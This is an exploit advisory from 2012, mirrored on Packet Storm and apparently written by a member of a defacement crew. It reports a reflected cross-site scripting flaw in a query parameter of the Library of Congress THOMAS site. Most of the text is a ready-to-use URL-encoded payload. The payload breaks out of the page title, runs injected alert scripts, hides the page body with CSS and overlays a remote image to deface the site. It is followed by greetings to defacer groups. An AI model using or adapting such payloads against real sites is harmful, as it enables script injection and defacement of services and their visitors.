THOMAS (The Library Of Congress) at thomas.loc.gov suffers from a cross site scripting vulnerability.
774ef3e3c0ccd31308da9cd17f4625cd763df17933e2c3d493ebaa4d69839620# Exploit Title: THOMAS (The Library of Congress)Cross Site Scripting
# Google Dork: -
# Date: 26/3/2012 1:35 AM (Malaysia)
# Author: Ryuzaki Lawlet
# Blog: http://justryuz.blogspot.com
# Tested on: Linux (OSHIRIX)
# CVE : XSS
######Vulnerable########
Vulnerable : http://thomas.loc.gov/cgi-bin/query/z?c112=
######Live Preview########
Sites:
http://thomas.loc.gov/cgi-bin/query/z?c112=%20wo.0t??%20by%20Ryuzaki%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C/title%3E%3Cscript%3Ealert%28%22wo.0t??%20by%20Ryuzaki%22%29%3C/script
%3E%3Cscript%3Ealert%28%22http://justryuz.blogspot.com%22%29%3C/script%3E%3Cscript%3Ealert%28%22Cyb3rSec%20Crew%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html%20{%20background-image:%20url%28https://fbcdn-profile-a.akamaihd.net/hprofile-ak-snc4/277062_207390472645570_423082005_n.jpg%29;%20}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;left:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3C/div%3E#185
######Preview########
Screen shot
http://3.bp.blogspot.com/-W6yDC4HvuKc/T29YMGql3nI/AAAAAAAAAk8/cmdBqBeVsYc/s1600/xss.png
######Credit########
Source:
http://justryuz.blogspot.com/2012/03/wo0t-thomas-library-of-congresscross.html
Antuwebhunt3r| Md Lothdh | Ben CyberSEC | Misa CyberSEC | Sbkiller CyberSEC | Xay CyberSEC | Kejung$ CyberSEC | Biang Rusuh | Afnum vvip | HambaMalam | shah RC | Cak vvip | Lod vvip | Fakyu Tuyu | Alex John NEC | Dark Angel NEC | Cyg Selalu | chliz Aceh | Breackerz Code | Dboyz vvip | AgoenkJR | Misz Nadea | Lone Ranger vvip | Nick Keluang Johor | bl4ckm4gicx NEC | Pak Kordi NEC | b0ogle | Ana dira | pamy | cik din | Jack RC | Thaqif CyberSEC | Hayate DevilSec | KiSSierra | Mike | Syakiller | Hidden Pain | Gilang | MagmaCode RC | MASOKISME and all member | Mambang Oshirix Team | CyberSEC | RileksCrew | Newbie3vilc063s | h3x4 Crew | T3D Hackers | Cyber 4rmy | Indonesia Defacer | Turki Defacer | Pakistan Defacer & Gaza Defacer
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed